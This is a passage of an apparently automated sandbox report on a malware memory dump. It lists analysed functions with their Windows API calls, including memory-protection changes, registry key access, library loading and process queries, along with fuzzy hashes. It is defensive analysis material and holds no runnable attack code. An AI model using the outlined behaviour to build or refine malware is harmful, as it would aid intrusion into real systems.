StrChrA.SHLWAPI(00000000,00000020,?,00000000,030448DE,00000000,030560DC,03051D54,?,00000001,?,?,?,?,030317CA,?), ref: 0304B202
StrStrA.SHLWAPI(00000000,?,?,00000000,030448DE,00000000,030560DC,03051D54,?,00000001,?,?,?,?,030317CA,?), ref: 0304B21E

Part of subcall function 03048502: lstrlen.KERNEL32(?,0305BCB8,00000000,00000000,0304F5D7,00000000,00000001,00000000,0305603C,?,?,0304BD43,00000000,00000000), ref: 0304850B
Part of subcall function 03048502: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,0304BD43,00000000,00000000,?,?,00000000,03051CF9), ref: 0304852E
Part of subcall function 03048502: memset.NTDLL ref: 0304853D

ExitProcess.KERNEL32 ref: 0304B350

Part of subcall function 03032734: StrTrimA.SHLWAPI(00000000,0305847C,00000000,?,0303E096,0304BD43,00000020,0305C290,?,?,0304BD43), ref: 03032778

lstrcmp.KERNEL32(00000000,?), ref: 0304B26E

Part of subcall function 0304B9D4: FindFirstFileW.KERNEL32(?,?,?,?), ref: 0304BA60
Part of subcall function 0304B9D4: FindNextFileW.KERNEL32(?,00000010), ref: 0304BAEA
Part of subcall function 0304B9D4: FindClose.KERNEL32(00000002), ref: 0304BAF8
Part of subcall function 0304B9D4: FreeLibrary.KERNEL32(?), ref: 0304BB0A

Part of subcall function 0303D822: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0303D845
Part of subcall function 0303D822: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,0304B2AE,?,?,00000000,030448DE,00000000,030560DC,03051D54), ref: 0303D886

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Find$FileFreeHeap$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmplstrlenmemcpymemset
String ID:
API String ID: 2597392196-0
Opcode ID: cb8a4e8f874df517fcbb9231281b7548b6f93f223de9e4c35594320d5f8185d3
Instruction ID: 31778e79a378cab2134c31f6fab7439e738f33ee2e5634b50b36cb14c876a0b1
Opcode Fuzzy Hash: cb8a4e8f874df517fcbb9231281b7548b6f93f223de9e4c35594320d5f8185d3
Instruction Fuzzy Hash: C841ABB6206305AFD760EF65C8848AFB7EDEB84241F088C3DF595C6110EB35EA048B16

Uniqueness

Uniqueness Score: -1.00%

Function 0304FA40, Relevance: 7.6, APIs: 5, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0304BC2F: GetLastError.KERNEL32(?,00000000,0305B7A4,0305B7A0,-0000000C,00000000,?,?,03041BE7,0000000C,00000000,?), ref: 0304BC5C
Part of subcall function 0304BC2F: VirtualQuery.KERNEL32(03041BE7,0305B7A4,-66AC9DF0,?,00000000,0305B7A4,0305B7A0,-0000000C,00000000,?,?,03041BE7,0000000C,00000000,?), ref: 0304BC73

GetLastError.KERNEL32(00000000,00000004,0303F20D,?,810C74FC,00000000,?,03058560,0000001C,03049FA2,00000002,03041BE7,00000001,0000000C,0305B7A0,0000000C), ref: 0304FB99

Part of subcall function 0303811C: lstrlen.KERNEL32(0305B620,0305B7A4,00000402,0305B7A4), ref: 03038154
Part of subcall function 0303811C: lstrcpy.KERNEL32(00000000,0305B620), ref: 0303816B
Part of subcall function 0303811C: StrChrA.SHLWAPI(00000000,0000002E), ref: 03038174
Part of subcall function 0303811C: GetModuleHandleA.KERNEL32(00000000), ref: 03038192

VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,03041BE7,?,0305B620,03041BE7,?,00000000,00000004,0303F20D,?,810C74FC), ref: 0304FB17
VirtualProtect.KERNEL32(0305B7A4,00000004,0303F20D,0303F20D,03041BE7,?,00000000,00000004,0303F20D,?,810C74FC,00000000,?,03058560,0000001C,03049FA2), ref: 0304FB32
RtlEnterCriticalSection.NTDLL(0305C300), ref: 0304FB56
RtlLeaveCriticalSection.NTDLL(0305C300), ref: 0304FB74

Part of subcall function 0304BC2F: SetLastError.KERNEL32(0000000C,?,00000000,0305B7A4,0305B7A0,-0000000C,00000000,?,?,03041BE7,0000000C,00000000,?), ref: 0304BCA1

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLastVirtual$CriticalProtectSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 11654437-0
Opcode ID: ca0c1879302f58fcfc56a21e9a690425f23637f4d1c463afecbfc6d8bd82f374
Instruction ID: ace43832434cb03b23ab1bfe36438a34dc568f2d7c872b36541c9f6d19a82586
Opcode Fuzzy Hash: ca0c1879302f58fcfc56a21e9a690425f23637f4d1c463afecbfc6d8bd82f374
Instruction Fuzzy Hash: 94415EB590170AEFDB10DF69C845AAEBBF8FF49310F048129E915AB250D774EA50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0304F67F, Relevance: 7.6, APIs: 5, Instructions: 107
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,0304BA4F,?,?), ref: 0304F68C

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0304BA4F,?,?), ref: 0304F6B5
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,0304BA4F,?,?), ref: 0304F6FC
LoadLibraryW.KERNELBASE(-0000FFFE,?,?,?,0304BA4F,?,?), ref: 0304F6FF
FreeLibrary.KERNEL32(00000000,?,?,?,0304BA4F,?,?), ref: 0304F7C3

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CurrentDirectoryLibrary$AllocateFreeHeapLoadlstrlen
String ID:
API String ID: 3371844678-0
Opcode ID: 38f14327f51e23d34834536f1d62c30ca2db90c1172959f308e663fc7e22f361
Instruction ID: c07e511fb2a68040448f0a4f67e8715beb69fb8a616f52260cdd5494bc8d00c3
Opcode Fuzzy Hash: 38f14327f51e23d34834536f1d62c30ca2db90c1172959f308e663fc7e22f361
Instruction Fuzzy Hash: F5317CB150230BAFE750EF64DD84DABBBECFF05654B044A36A944C7215DB39EA01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0303B84E, Relevance: 4.6, APIs: 3, Instructions: 67
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03038E53: RegCreateKeyA.ADVAPI32(80000001,0305C0D4,?), ref: 03038E68
Part of subcall function 03038E53: lstrlen.KERNEL32(0305C0D4,00000000,00000000,00000000,?,0303B86A,00000000,00000000,00000001,0305603C,0304BD19,0304BD19,?,0304ED32,00000000,0304BD19), ref: 03038E91

RtlAllocateHeap.NTDLL(00000000,?), ref: 0303B89A
HeapFree.KERNEL32(00000000,?,?,0304ED32,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0303B8D0
RegCloseKey.KERNELBASE(00000000,?,0304ED32,00000000,0304BD19,00000000,00000001,00000000,0305603C,?,?,?,0304BD19,00000000), ref: 0303B8DE

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 2798709597-0
Opcode ID: 8d04e0967aa82d59af04ef61c8e2ab8c1c577b7da57dd00a413515c490b238a6
Instruction ID: 73246496a5b01187fb2a053878061ab1e261f3d2632879bf3eb39785ef9d8fbf
Opcode Fuzzy Hash: 8d04e0967aa82d59af04ef61c8e2ab8c1c577b7da57dd00a413515c490b238a6
Instruction Fuzzy Hash: 57112BB250120DFFDB01AF99DC84CAF7BBEEB89254B15086AF50197120E771AD54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03038E53, Relevance: 4.5, APIs: 3, Instructions: 40
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(80000001,0305C0D4,?), ref: 03038E68
RegOpenKeyA.ADVAPI32(80000001,0305C0D4,?), ref: 03038E72
lstrlen.KERNEL32(0305C0D4,00000000,00000000,00000000,?,0303B86A,00000000,00000000,00000001,0305603C,0304BD19,0304BD19,?,0304ED32,00000000,0304BD19), ref: 03038E91

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: e7dc2d2ffe5b2eea03c678cbefb81dc88910246424b1c0203ab29f05be910729
Instruction ID: 2b4cb0d8a5c524ebb9477a68ab914c4aefd97748faf4bdfc9cab69aed18ef8aa
Opcode Fuzzy Hash: e7dc2d2ffe5b2eea03c678cbefb81dc88910246424b1c0203ab29f05be910729
Instruction Fuzzy Hash: 19F06D76142209BFEB11EF90DC88FAB7BACEB86754F108089F94289144D7B59A44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0304F5F1, Relevance: 4.5, APIs: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4), ref: 0304F60C
IsWow64Process.KERNEL32(?,00000000,?,00000000,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4,00000000), ref: 0304F61D
FindCloseChangeNotification.KERNELBASE(?,?,?,0304E52B,00000000,00000000,00000000,00000000,?,0305C1E4,03037294,0305C1E4,00000000,?,?,03044958), ref: 0304F630

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: 3db1c12e5a5ce4ef6f8b6cc35a375e6b5d79c461830ffa889138bcfa91548133
Instruction ID: b0a103d78e01a79be0efa581f2ac3ee5566376f37fb8cc28b6eefeb10ea45dd7
Opcode Fuzzy Hash: 3db1c12e5a5ce4ef6f8b6cc35a375e6b5d79c461830ffa889138bcfa91548133
Instruction Fuzzy Hash: 95F05EB6902218FB8B61EF55D808C9FBBE8EB85691B145165E905A3104E3364B4196A4

Uniqueness

Uniqueness Score: -1.00%

Function 03044865, Relevance: 3.1, APIs: 2, Instructions: 86
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,030560DC,03051D54,?,00000001,?,?,?,?,030317CA,?,?,?,00000001), ref: 03044922
WaitForSingleObject.KERNEL32(?,00000000,00000000,030560DC,03051D54,?,00000001,?,?,?,?,030317CA,?,?,?,00000001), ref: 03044946

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 360422afd62c8afaeaddec1c87317633a3a0772f04c8ed6bf668bd21630ab88f
Instruction ID: a3ec2218ecd267e1af162ca2127aa7450d86250de6a5b54a56fd3385980806c8
Opcode Fuzzy Hash: 360422afd62c8afaeaddec1c87317633a3a0772f04c8ed6bf668bd21630ab88f
Instruction Fuzzy Hash: F321F5F650B3418FDBB4FF6D94C8BBFB2E8A70A15431C0A7AD106CB214D624CE819B12

Uniqueness

Uniqueness Score: -1.00%

Function 03035B50, Relevance: 3.1, APIs: 2, Instructions: 81
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03038E53: RegCreateKeyA.ADVAPI32(80000001,0305C0D4,?), ref: 03038E68
Part of subcall function 03038E53: lstrlen.KERNEL32(0305C0D4,00000000,00000000,00000000,?,0303B86A,00000000,00000000,00000001,0305603C,0304BD19,0304BD19,?,0304ED32,00000000,0304BD19), ref: 03038E91

RegQueryValueExA.ADVAPI32(03051CFE,00000000,00000000,?,0305B06C,?,00000001,03051CFE,00000001,00000000,0305603C,?,?,?,00000000,03051CFE), ref: 03035BA4
RegCloseKey.ADVAPI32(03051CFE,?,?,?,00000000,03051CFE,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC), ref: 03035BEF

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID:
API String ID: 971780412-0
Opcode ID: 5f9a757db42100fcc3c99cdd934ddfb3762bd9947ef9e61938751c19db7c5f01
Instruction ID: 4bf4836b40bef8f75b928b26ec83b40b80b2a8f76616906f8d3649c06e34b1ca
Opcode Fuzzy Hash: 5f9a757db42100fcc3c99cdd934ddfb3762bd9947ef9e61938751c19db7c5f01
Instruction Fuzzy Hash: FB314A76D02318EFDB61EF94EC409AFBBFCEB46710F00456AE910A6124D7746A40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03043B22, Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03038E53: RegCreateKeyA.ADVAPI32(80000001,0305C0D4,?), ref: 03038E68
Part of subcall function 03038E53: lstrlen.KERNEL32(0305C0D4,00000000,00000000,00000000,?,0303B86A,00000000,00000000,00000001,0305603C,0304BD19,0304BD19,?,0304ED32,00000000,0304BD19), ref: 03038E91

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000000,00000001,?,00000001,00000000), ref: 03043B63
RegCloseKey.ADVAPI32(?), ref: 03043BB7

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID:
API String ID: 971780412-0
Opcode ID: a1745b80d6129b362b46ef108fdcbc2cff290d2810108eb98d814431ae2fac6e
Instruction ID: be07283a93265c92ff2fb72fc56394d46b6fb6d054f7e3f073901683e1467587
Opcode Fuzzy Hash: a1745b80d6129b362b46ef108fdcbc2cff290d2810108eb98d814431ae2fac6e
Instruction Fuzzy Hash: A6113D75902318EFEF10EFA5DC44BEEBBBCEB45710F1044A5EA00A7154D7B4AA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0304BCB0, Relevance: 3.1, APIs: 2, Instructions: 54
memorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,03051CF9,0305C138,?,?,00000000), ref: 0304BCED
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03051CF9), ref: 0304BD4E

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 383a44adb79e11b90bca3a72329550a986e7c3d440aa96cd35beb21554fa234a
Instruction ID: 83442451b0b351d8768cbe163e16e4a6c987ea8d554208a4c7f39c279340758d
Opcode Fuzzy Hash: 383a44adb79e11b90bca3a72329550a986e7c3d440aa96cd35beb21554fa234a
Instruction Fuzzy Hash: 1F111CB690230DEBDF10EBE8D944ADFB7BDEB08315F1004A2A501E6154E738EB44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 03052400, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0305BFFC), ref: 03052415

Part of subcall function 03047523: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0304754E
Part of subcall function 03047523: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0304755B
Part of subcall function 03047523: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 030475E7
Part of subcall function 03047523: GetModuleHandleA.KERNEL32(00000000), ref: 030475F2
Part of subcall function 03047523: RtlImageNtHeader.NTDLL(00000000), ref: 030475FB
Part of subcall function 03047523: RtlExitUserThread.NTDLL(00000000), ref: 03047610

InterlockedDecrement.KERNEL32(0305BFFC), ref: 03052439

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: ffb5b41f12dc90f33d04e24792628c8463da5c989bec00b34bfc0d3a10a20321
Instruction ID: b764137a4d9b2baa85032c482f117dd829fe40ce81c57c48845562de12dbd15d
Opcode Fuzzy Hash: ffb5b41f12dc90f33d04e24792628c8463da5c989bec00b34bfc0d3a10a20321
Instruction Fuzzy Hash: 10E0123224722157CB51FAA49C0476FB699AF50756F489C58FC51D6421D711C4508FE2

Uniqueness

Uniqueness Score: -1.00%

Function 03043713, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000001,00000000,0305603C,?,?,00000000,03051CE8,?,?,?,?,030317CA,?,?,?), ref: 03043728

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b017f26aa3d73f5efb983938d398305ef21c3a4720780680dde9d09a341be5a0
Instruction ID: 235258ca0aab1f01fb4845f03a5c90c9b5960c61c931e3d08eaa4dfbc1ba72f0
Opcode Fuzzy Hash: b017f26aa3d73f5efb983938d398305ef21c3a4720780680dde9d09a341be5a0
Instruction Fuzzy Hash: 193150F9A02204EFDB60EF9CC58199EB7F9FB45614F5490BAD644AB205C330AA51CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0303F1B9, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(03041BE5,0305B7A0,-0000000C,00000000,?,?,03041BE7,0000000C,00000000,?,?,?,?,?,030317CA,?), ref: 0303F1F4

Part of subcall function 0303D274: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,0305C300), ref: 0303D28B

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 06940b960a26b205e4ba1a6510c8730b0b62c75ac374da8ee425e25ac6bca6c7
Instruction ID: f97fa6dd1a1d73ffd090a8cdf89fbb8e2883782263a31abe383a76a0bcb9aa3b
Opcode Fuzzy Hash: 06940b960a26b205e4ba1a6510c8730b0b62c75ac374da8ee425e25ac6bca6c7
Instruction Fuzzy Hash: C5219679E05206EFDB60CF99C580D6AF7EDEF832907188429E959CB150D771ED01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03054BF1, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3d27d459b727faa33964cd2d9e6d2d2f6d15709837e767e2995e1ba9447288a6
Instruction ID: f1826a0f83f72b2f5328eaf5e5268ef3f073b1da0c98aae2d996a14058cd1707
Opcode Fuzzy Hash: 3d27d459b727faa33964cd2d9e6d2d2f6d15709837e767e2995e1ba9447288a6
Instruction Fuzzy Hash: CAB012D93AF2067C7004E1035C06CFF211CC0C0910320891AFC00CD0009D405DC40031

Uniqueness

Uniqueness Score: -1.00%

Function 03054F10, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 83270d9a2a3db106132c13f3d1b3acc6c1b05c057ecad0238899b3094a7c968c
Instruction ID: 34089661fad2a03bb930e1f6e8dd212f5ab247e54fa4c9263b0bd043c87d3cca
Opcode Fuzzy Hash: 83270d9a2a3db106132c13f3d1b3acc6c1b05c057ecad0238899b3094a7c968c
Instruction Fuzzy Hash: B6B012C53DF10EEC7108D1065C53DFF314CC4C0910370890AFC00C9040D5C05C800431

Uniqueness

Uniqueness Score: -1.00%

Function 03054F1A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 684aa98aa360f839549794e8a807679236016a98c38a71d23d905d57cfb541a9
Instruction ID: 06eae8b348165343d4741a16af4694c0aeaae512740c6016f234d3887db95d14
Opcode Fuzzy Hash: 684aa98aa360f839549794e8a807679236016a98c38a71d23d905d57cfb541a9
Instruction Fuzzy Hash: 31B012C53DF10EECB108D1065D43DFF214CC4C0910330890AFC00C9080D5C15D810032

Uniqueness

Uniqueness Score: -1.00%

Function 03054F24, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f3744134767ef0b8a2d65a059cf8376b9c15e2a38ac89270155cae738df9f039
Instruction ID: 80f3b2102590713dc9dd1bbf193fb2e5fd7812247d5ae7d55702ab1884568ac6
Opcode Fuzzy Hash: f3744134767ef0b8a2d65a059cf8376b9c15e2a38ac89270155cae738df9f039
Instruction Fuzzy Hash: D1B012C53DF20EEC7108D1065C43DFF214CC4C09103308A0AFC00C9040D5C05CC00031

Uniqueness

Uniqueness Score: -1.00%

Function 03054F42, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 323d9d1cbdaf464e83a4c230aeecd006d94bdfb6da6de36e6fcef868a381d771
Instruction ID: dfeb895bf6cd5383bdbd51e7238c75e0226f0acd5b243b0426dc8dc31cdcdf97
Opcode Fuzzy Hash: 323d9d1cbdaf464e83a4c230aeecd006d94bdfb6da6de36e6fcef868a381d771
Instruction Fuzzy Hash: BFB012C53DF10DED7108D1065E03DFF214CD0C0A10330890AFC00C9000D5C15C810132

Uniqueness

Uniqueness Score: -1.00%

Function 03054F71, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054F83

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: e2814f5982c731e54ab70dc7a13d701a63c3a67957a4bb05026932f001efef9d
Instruction ID: c9b9a4d9f0784faf7d1fa00bcb14252e5484eb58d5e2c0582763f694dcf8211b
Opcode Fuzzy Hash: e2814f5982c731e54ab70dc7a13d701a63c3a67957a4bb05026932f001efef9d
Instruction Fuzzy Hash: 20B012D93EF1097C7108D1175C26CFF210CC0C0D14320C80AFC00D804196402C840031

Uniqueness

Uniqueness Score: -1.00%

Function 03054EF2, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054ED5

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 4a4adf11b0b972791773b01c761e47826b85f5bce8eeb46c088cd45bca637156
Instruction ID: bb2c753dfbde8847f80b718d863fb33fae8f94a6fd085d6454080860832600f8
Opcode Fuzzy Hash: 4a4adf11b0b972791773b01c761e47826b85f5bce8eeb46c088cd45bca637156
Instruction Fuzzy Hash: C8B0928529B209AC7108D1065C42DBB224CC0C09103208A0ABC00C901095805C804031

Uniqueness

Uniqueness Score: -1.00%

Function 03054C0C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 04f2444baa819bbe116b3429f01eddaa75f73e7f6270d05c0db1e0f905693400
Instruction ID: 0b0c7c6c9911d06435ae1948016be6bcad4af5dcd882c33ebb92fb9e8e69dc4d
Opcode Fuzzy Hash: 04f2444baa819bbe116b3429f01eddaa75f73e7f6270d05c0db1e0f905693400
Instruction Fuzzy Hash: 24B012D53AF10D7C7004D1075C06DFF225CC5C0950360840AFC04CD000D9405D840031

Uniqueness

Uniqueness Score: -1.00%

Function 03054C5C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03054C03

Part of subcall function 03054918: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,?,03030000), ref: 03054991

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 7eaf13e66df19221478bb97d861edd9d258d4a6e461ee93c6c0de0cc59712e11
Instruction ID: e7c02ae6ae289875b09f4b5e48b49a491ac97adb7069ce7334a99f3f43e89bfc
Opcode Fuzzy Hash: 7eaf13e66df19221478bb97d861edd9d258d4a6e461ee93c6c0de0cc59712e11
